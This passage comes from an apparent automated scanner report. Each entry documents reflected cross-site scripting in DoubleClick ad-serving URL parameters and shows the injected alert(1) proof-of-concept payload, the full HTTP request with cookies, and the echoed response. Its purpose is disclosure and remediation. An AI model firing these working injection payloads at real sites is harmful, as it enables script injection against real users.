B4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-85609413874722597de38"-alert(1)-"0bf768e1cd4&adurl=https%3a%2f%2fwww.hyatt.com/gp/en/offers/possibilities-promo.jsp%3Fsrc%3Dagn_phd_GP_ba_google");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
v
...[SNIP]...

2.16. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [num parameter]

Summary

Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N4300.Google/B5350353.10

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c88d7"-alert(1)-"6821c14b674 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1c88d7"-alert(1)-"6821c14b674&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:38:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7505

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1c88d7"-alert(1)-"6821c14b674&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=https%3a%2f%2fwww.hyatt.com/gp/en/offers/possibilities-promo.jsp%3Fsrc%3Dagn_phd_GP_ba_google");
var fscUrl = url;
var f
...[SNIP]...

2.17. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [sig parameter]

Summary

Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N4300.Google/B5350353.10

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8117d"-alert(1)-"7e74982024a was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q8117d"-alert(1)-"7e74982024a&client=ca-pub-8560941387472259&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:38:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7505

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q8117d"-alert(1)-"7e74982024a&client=ca-pub-8560941387472259&adurl=https%3a%2f%2fwww.hyatt.com/gp/en/offers/possibilities-promo.jsp%3Fsrc%3Dagn_phd_GP_ba_google");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode
...[SNIP]...

2.18. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [sz parameter]

Summary

Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N4300.Google/B5350353.10

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64633"-alert(1)-"82f4d6621e2 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l64633"-alert(1)-"82f4d6621e2&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:38:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7505

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
click%3Bh%3Dv8/3b02/f/1a3/%2a/m%3B239256273%3B0-0%3B0%3B61534219%3B4307-300/250%3B41414511/41432298/1%3B%3B%7Eokv%3D%3Bpc%3DgdncID5TgIAAAA%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l64633"-alert(1)-"82f4d6621e2&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_g
...[SNIP]...

2.19. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [adurl parameter]

Summary

Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 118ea"-alert(1)-"9a2ca46d5eb was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=118ea"-alert(1)-"9a2ca46d5eb HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7402
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:36:23 GMT
Expires: Mon, 09 May 2011 15:36:23 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
i4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=118ea"-alert(1)-"9a2ca46d5ebhttp://www.progressive.com/insurance/discounts/display.aspx?&code=9903600331");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "nev
...[SNIP]...

2.20. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [ai parameter]

Summary

Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3576"-alert(1)-"0cedd303306 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQBa3576"-alert(1)-"0cedd303306&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=;ord=177302960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:35:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7464

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
vbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQBa3576"-alert(1)-"0cedd303306&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=http%3a%2f%2fwww.progressive.com/insurance/cre/scoreboard-display.aspx%3F%26code%3D9903600269");
var fscUrl = url;
v
...[SNIP]...

2.21. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [client parameter]

Summary

Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29706"-alert(1)-"604da592d10 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-674362252520257229706"-alert(1)-"604da592d10&adurl=;ord=177302960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:36:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7556

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
CAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-674362252520257229706"-alert(1)-"604da592d10&adurl=http%3a%2f%2fwww.progressive.com/insurance/nyp/display.aspx%3F%26code%3D9903600230%26utm_medium%3Dbanner%26utm_campaign%3Dnyp");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...

2.22. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [num parameter]

Summary

Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf6f4"-alert(1)-"a73c9128e07 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1cf6f4"-alert(1)-"a73c9128e07&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=;ord=177302960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:36:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7556

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
TcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1cf6f4"-alert(1)-"a73c9128e07&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=http%3a%2f%2fwww.progressive.com/insurance/nyp/display.aspx%3F%26code%3D9903600230%26utm_medium%3Dbanner%26utm_campaign%3Dny
...[SNIP]...

2.23. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30950"-alert(1)-"246a968b642 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw30950"-alert(1)-"246a968b642&client=ca-pub-6743622525202572&adurl=;ord=177302960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:36:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7464

